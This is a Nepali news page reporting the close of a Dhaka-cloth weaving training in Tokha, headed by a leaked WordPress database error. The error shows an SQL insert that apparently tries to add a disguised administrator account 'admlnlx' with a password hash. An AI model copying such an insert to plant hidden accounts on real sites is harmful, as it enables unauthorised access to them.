WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMVWvvfHIfLG/O5bHALXffLnaUI27A1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 18:24:35', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २८ –
आब २०७२÷७३ को दोस्रो तथा आव २०७३÷७४ को पहिलो सत्रमा व्यावसायिक तथा सीप विकास तालिम केन्द्र, भैँसेपाटी तथा महिला जागरण समाज नेपाल, टोखाको संयुक्त तत्वावधानमा आयोजित ढाका बुनाइसम्बन्धी तालिम सोमबार सम्पन्न भएको छ ।
प्रशिक्षक रामलाल श्रेष्ठले सहभागीलाई प्रमाणपत्र वितरण गर्दै तालिमका प्रशिक्षार्थीलाई सीपलाई निरन्तरता दिन र टोखामा ढाका कपडाको व्यवसाय गर्न सुझाव दिनुभयो । तालिम संयोजक ज्ञानमाया डङ्गोलले तालिममा सिकेको सीपलाई आफ्नो व्यवसायमा लगाउनुपर्ने बताउनुभयो ।
तालिमका प्रशिक्षार्थीद्वय शारदा लवट र हेकुललक्ष्मी श्रेष्ठले तालिममा सिकेको सीपलाई निरन्तरता दिइने प्रतिबद्धता व्यक्त गर्नुभयो । सो अवसरमा प्रशिक्षक एवम् तालिम केन्द्रका प्रतिनिधि प्रशिक्षकलाई सम्मान र प्रशंसापत्र प्रदान गरिएको थियो । तालिममा ५२ जना महिला पुरुषको सहभागिता थियो । – रासस